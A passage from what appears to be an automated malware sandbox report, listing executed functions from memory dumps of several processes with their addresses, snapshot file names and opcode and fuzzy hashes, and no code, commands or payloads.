                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2885430031.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34890000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 146d7a138655454c6839aff5e931d2f662837148233b78594817bfe67d22764e
                                                                                                                  • Instruction ID: 7284bdcfe8a1f8aff42cd07ed6fae1da8a82dff532f9ce6d54a7ff494ebb7a87
                                                                                                                  • Opcode Fuzzy Hash: 146d7a138655454c6839aff5e931d2f662837148233b78594817bfe67d22764e
                                                                                                                  • Instruction Fuzzy Hash: 36C04C15F1CC1B57F365635444315FE08565F45704F545434E10ED73CACF2C6D0112C6
                                                                                                                  Function 00007FFD348906D0 Relevance: .0, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2885430031.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34890000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction ID: cc3d184c9fcb1dd5c285a91378f53d737a9dd478580d70c9afc5a45c63b667b8
                                                                                                                  • Opcode Fuzzy Hash: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction Fuzzy Hash: E3B01200E56C0F00A405337E08D206478406B47100FC10070DA0CC0081A84D20942242
                                                                                                                  Function 00007FFD34893A25 Relevance: .0, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2885430031.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34890000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction ID: 2d73799ed892581236e74a08544ec364c6049f70ebc541e4130449905e99eff6
                                                                                                                  • Opcode Fuzzy Hash: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction Fuzzy Hash: 16C02B11F0C40700F324433044601FD71404F03300F06C071401EE6480DE2C16043340

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFD34880D78 Relevance: .2, Instructions: 188COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ab40799a3838e636479fc5240e8875bf469a66f798587f0b6ca7449a7fc05fd4
                                                                                                                  • Instruction ID: 99703e2c593f59a432551898a4a13779a51845e1db01fb8718779cf24a0cd5e0
                                                                                                                  • Opcode Fuzzy Hash: ab40799a3838e636479fc5240e8875bf469a66f798587f0b6ca7449a7fc05fd4
                                                                                                                  • Instruction Fuzzy Hash: 1C51E471E18B8A4FE795DBA888753A9BFE5FF9A300F4500BAD04DD72D2CE7828058750
                                                                                                                  Function 00007FFD3488090D Relevance: .2, Instructions: 154COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 02a7df2e28b2761d34609b1edde833e0a966e55296b6a2ae4da1c3a23afc34c0
                                                                                                                  • Instruction ID: c2c4388c839990767a0f456063868630f18d8f74fd1564459797eac74aefeb65
                                                                                                                  • Opcode Fuzzy Hash: 02a7df2e28b2761d34609b1edde833e0a966e55296b6a2ae4da1c3a23afc34c0
                                                                                                                  • Instruction Fuzzy Hash: 13412722B0C9551FE754B7FC60BA6FA7795EF8A320B1849BBD04DC71D3DD38A8818284
                                                                                                                  Function 00007FFD348808E8 Relevance: .1, Instructions: 134COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b6456d485d7d247cc7f77abaa4a331c8dd7de4e7ae6363fe8f4e46c5cf00cc56
                                                                                                                  • Instruction ID: 8652c006c93b782a3801aa2f9c5a4a1185cc1f841d54c68a3ccf35deb99ca974
                                                                                                                  • Opcode Fuzzy Hash: b6456d485d7d247cc7f77abaa4a331c8dd7de4e7ae6363fe8f4e46c5cf00cc56
                                                                                                                  • Instruction Fuzzy Hash: 3231F73130C9194FD768EB5CE89A9B977D0EF4632130501BBE58AC7166D911EC828782
                                                                                                                  Function 00007FFD34880960 Relevance: .1, Instructions: 117COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e08d266453b8044214bc5bc357d2a50769387b0f0418f66e8618d57aa6fc0a7b
                                                                                                                  • Instruction ID: b282dd84f145f29a36ea781a327d4d91edd5d78a140d10e5f1d02993b772e913
                                                                                                                  • Opcode Fuzzy Hash: e08d266453b8044214bc5bc357d2a50769387b0f0418f66e8618d57aa6fc0a7b
                                                                                                                  • Instruction Fuzzy Hash: 0031C421B1CA1A1FE798B7BC64BA6FA63D5DF89321B1455BAE40DC32D3DD38AC414284
                                                                                                                  Function 00007FFD34880998 Relevance: .1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3b407425975eb48355c8c4a1dce93618c3447e304de50a6402f277cb2a1e5681
                                                                                                                  • Instruction ID: 860382b3f298ec1d864cb2d55bc36f33628818328b8c0741bab35cadc7f59714
                                                                                                                  • Opcode Fuzzy Hash: 3b407425975eb48355c8c4a1dce93618c3447e304de50a6402f277cb2a1e5681
                                                                                                                  • Instruction Fuzzy Hash: 2F21C921B18D5A0FE7D8F76C54AA6B677C6EF9D311B5404B9E50DC32D3DD28AC418281
                                                                                                                  Function 00007FFD34880C25 Relevance: .1, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 886673dccda73dc56aa59fe30bdcf0cac5fdd763311fa1f4bf37c3e9ea170029
                                                                                                                  • Instruction ID: 8d71182a12ca4557fc3a9a2e80e08b5a3de2469698398fce45db6864e7fa430c
                                                                                                                  • Opcode Fuzzy Hash: 886673dccda73dc56aa59fe30bdcf0cac5fdd763311fa1f4bf37c3e9ea170029
                                                                                                                  • Instruction Fuzzy Hash: F321F336A0D3898FE712DB6898A11DD7FB0EF53320F1542B7D144DB1C2D63826069791
                                                                                                                  Function 00007FFD34880C38 Relevance: .1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c43ac0e9e8f2d9e9848485839fb2b27bacae8ab179e9e5e29731aa5b6dd3486f
                                                                                                                  • Instruction ID: ee099f9becb69fa132d960b96461b51f5ffc9fab4e420bed93cb2536f349bccc
                                                                                                                  • Opcode Fuzzy Hash: c43ac0e9e8f2d9e9848485839fb2b27bacae8ab179e9e5e29731aa5b6dd3486f
                                                                                                                  • Instruction Fuzzy Hash: 6911A035A0D3899FE712DBB888A11DD7FB0AF53310F0645B6C184DB192D53866059790
                                                                                                                  Function 00007FFD34880C40 Relevance: .0, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d89e7ec08a6ea71a3d0057bcc14b09e7d0f000ffc8ec9ddd990ebd9703193181
                                                                                                                  • Instruction ID: 00bd258087b8aa50fb41ec7739cd0323b6bd41a5294226edbc50420012944a7e
                                                                                                                  • Opcode Fuzzy Hash: d89e7ec08a6ea71a3d0057bcc14b09e7d0f000ffc8ec9ddd990ebd9703193181
                                                                                                                  • Instruction Fuzzy Hash: 7611AD35A0D3888FE712DBA8C8A02DD7FB0AF53310F0645FAC584DB192D63866499781
                                                                                                                  Function 00007FFD34880C48 Relevance: .0, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6976a93242fbd27780d5fd075501feb3258e02f92eb9cd7c7cc8221085b819f1
                                                                                                                  • Instruction ID: 7ebcc64d21dcadfa3fe12408f194a45b473b2fb467ed13154613d5d822934c91
                                                                                                                  • Opcode Fuzzy Hash: 6976a93242fbd27780d5fd075501feb3258e02f92eb9cd7c7cc8221085b819f1
                                                                                                                  • Instruction Fuzzy Hash: 00019E35A0D3888FE712DBB8C8A029D7FB0AF43310F1941EAC544DB192D6386A459781
                                                                                                                  Function 00007FFD34880C50 Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fa3deed2b961f3e6d0c93fb18a1c804dfd74c861153203f99b0397e95b0a1971
                                                                                                                  • Instruction ID: a6f4ff8580bec2c082c93793a63f7ed62790e7166e93df983d1950a6c7e0dc9f
                                                                                                                  • Opcode Fuzzy Hash: fa3deed2b961f3e6d0c93fb18a1c804dfd74c861153203f99b0397e95b0a1971
                                                                                                                  • Instruction Fuzzy Hash: 64018F34E0D3899FE712DBB888A429D7FF0AF13310F1941EAC544DB193DA386A449781
                                                                                                                  Function 00007FFD34883FBF Relevance: .0, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction ID: cc1dbcfd56367301f083da3ad46f17e54c088d5b339500f8826ab87fbcf9a650
                                                                                                                  • Opcode Fuzzy Hash: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction Fuzzy Hash: FAE01231B0811647F795AB54C8A07B972A1EF8A300F110078DB5DD33C5DF3CAD009745
                                                                                                                  Function 00007FFD348812E8 Relevance: .0, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction ID: eb51c2ef2f49df78aeef9a35f10684ed442e681ab93358b0954b3b2169bd7c28
                                                                                                                  • Opcode Fuzzy Hash: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction Fuzzy Hash: 3DC0123061080C8FCA88EB28C894E1473A0FB1A304B950094E00DCB2A1D62AECC2DB80
                                                                                                                  Function 00007FFD34880B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction ID: 92a19b049061f1b79014d34d758ce98f48aeec7c507c9c60df3bb14c9814b990
                                                                                                                  • Opcode Fuzzy Hash: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction Fuzzy Hash: C6C0123062880E8FDA80BB28C888924BBA0FF4F301BE908E0E00CC71A1D61998908B02
                                                                                                                  Function 00007FFD348806AD Relevance: .0, Instructions: 13COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction ID: f1bb64264544f2bb3d34ad0b68692d15da6e49be2bd9218b9f4269c231fb326f
                                                                                                                  • Opcode Fuzzy Hash: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction Fuzzy Hash: B7C04C05F5B75B01A9D5736E58E60ADA2409FC7624FE31572D75CD0091AC4D20D52156
                                                                                                                  Function 00007FFD34883CD0 Relevance: .0, Instructions: 10COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cae9baa72e705eb1ceaca1e5784d3eeabcddd31494b6f6dc20ec9df0c461cba7
                                                                                                                  • Instruction ID: 2aa8b5f6203690bda55239b6d1acb2b451e5f5a5a9f3a59e77c3e8d06ccbac7d
                                                                                                                  • Opcode Fuzzy Hash: cae9baa72e705eb1ceaca1e5784d3eeabcddd31494b6f6dc20ec9df0c461cba7
                                                                                                                  • Instruction Fuzzy Hash: 5FC04C15F1881B46F369775444315FE58565F45704F555434E10DD73CACF2C6E0112C6
                                                                                                                  Function 00007FFD348806D0 Relevance: .0, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction ID: b6b10bd4a8ef1bf12007b0086fd591c9700fa20bce66c1c0c6d8702113cc0d71
                                                                                                                  • Opcode Fuzzy Hash: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction Fuzzy Hash: 10B01200E5640F00A494337E0CD206470409F87100FC30070E61CC0081A84D10942242
                                                                                                                  Function 00007FFD34883A25 Relevance: .0, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.3706051638.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ffd34880000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction ID: 9de2cb9049ecf17efa582cc69677d96a7356e3dd4f836b216ab719e2a342ba91
                                                                                                                  • Opcode Fuzzy Hash: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction Fuzzy Hash: ABC02B10E4800600F3A4573044601FD71414F13300F07C071801ED6480DE2C16043340

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFD348A5A09 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 8363a4f63b37872a1a33cd80781cda2ef3b5766c67e6762943e0c60aedb71b00
                                                                                                                  • Instruction ID: d71072e27152e04ae5b1e859a0418dbeac62c206b972704c86b4eeb4dd1805a7
                                                                                                                  • Opcode Fuzzy Hash: 8363a4f63b37872a1a33cd80781cda2ef3b5766c67e6762943e0c60aedb71b00
                                                                                                                  • Instruction Fuzzy Hash: 1FF0A02164F3C04FCB569A344868445BFA0AF6721074A41EEC046CF1A3DA1C888AC711
                                                                                                                  Function 00007FFD348AEC09 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 7d0514ca89d9792722763a999b2ea547575e5740ce59337face6197d4c29f469
                                                                                                                  • Instruction ID: e537cd15f72d439b4d17bc32bd77b2af0f7db23e4361b915b79adf276e263310
                                                                                                                  • Opcode Fuzzy Hash: 7d0514ca89d9792722763a999b2ea547575e5740ce59337face6197d4c29f469
                                                                                                                  • Instruction Fuzzy Hash: 03F0E531A4E3C04FCB16DA3448648557FA0EF6721174A01EFC045CF1E3DA1CC889C701
                                                                                                                  Function 00007FFD348B23C9 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: fa3430309cb907b39f89e7102ac2ce3623e0cbc1b74ac8b40b74a434649741bf
                                                                                                                  • Instruction ID: 880200472f1ccde895183bce4ebd40d8c4a2e227fb5d935a4d4bb55277256d7c
                                                                                                                  • Opcode Fuzzy Hash: fa3430309cb907b39f89e7102ac2ce3623e0cbc1b74ac8b40b74a434649741bf
                                                                                                                  • Instruction Fuzzy Hash: 64F0657164E3C04FCB16EA3848694557FA1EF6721174951EEC045CF1A7DA1DDC85C741
                                                                                                                  Function 00007FFD348A94B9 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: I
                                                                                                                  • API String ID: 0-3707901625
                                                                                                                  • Opcode ID: 3b60b898ba252dd3bcdf1d5d13f51ef265d62053392955c7882d396e3e54edcb
                                                                                                                  • Instruction ID: 61e760a8f13bffe74a053450f749c4c6b2c9813dda591ecdd0f2bb60b567d64c
                                                                                                                  • Opcode Fuzzy Hash: 3b60b898ba252dd3bcdf1d5d13f51ef265d62053392955c7882d396e3e54edcb
                                                                                                                  • Instruction Fuzzy Hash: 88E0126154E3C04FCB55AB3484A58553FA0EF6721078A40DEC145CB1B3E61D8846C701
                                                                                                                  Function 00007FFD348A9309 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: I
                                                                                                                  • API String ID: 0-3707901625
                                                                                                                  • Opcode ID: 5ef45d3046cb215dfa72346539609a5a730a65416d750d2608aa4e67270a48a7
                                                                                                                  • Instruction ID: 1c8d99431eda0f6a9a369b3442355808c408c05adf1d905126c1db1218a02e08
                                                                                                                  • Opcode Fuzzy Hash: 5ef45d3046cb215dfa72346539609a5a730a65416d750d2608aa4e67270a48a7
                                                                                                                  • Instruction Fuzzy Hash: 4CE0E57154E7D04FCB46EB3488698447FA0AE6721078A44EEC185CF1B3E62E9849CB01
                                                                                                                  Function 00007FFD348B2459 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: I
                                                                                                                  • API String ID: 0-3707901625
                                                                                                                  • Opcode ID: 77ad75caabefd70dca60e4a01bd0194f01ee93901004744d98c8da1de6d59ab2
                                                                                                                  • Instruction ID: af17feaacf86eb1c48227f3cb6ad7558113d9fbef8c21e3176f33d3882c4acd6
                                                                                                                  • Opcode Fuzzy Hash: 77ad75caabefd70dca60e4a01bd0194f01ee93901004744d98c8da1de6d59ab2
                                                                                                                  • Instruction Fuzzy Hash: 17E01A7054E3C08FCB0AEB3488A98447FA0AE6B21078B41EEC145CF5B3D62D8849CB01
                                                                                                                  Function 00007FFD348A9534 Relevance: .2, Instructions: 218COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9a41c86d58fad32ffbba829b54896a878291275611a3e82ca99073105c693c91
                                                                                                                  • Instruction ID: 35aebe87600fba75aaf046dacb87868d4a27a2af3af371ef7ded9273d20874bd
                                                                                                                  • Opcode Fuzzy Hash: 9a41c86d58fad32ffbba829b54896a878291275611a3e82ca99073105c693c91
                                                                                                                  • Instruction Fuzzy Hash: 90719131B589098FDB98EF68C0E56A973E2FF99300F544978D10ED3296DE38E842DB50
                                                                                                                  Function 00007FFD348B47FA Relevance: .2, Instructions: 215COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
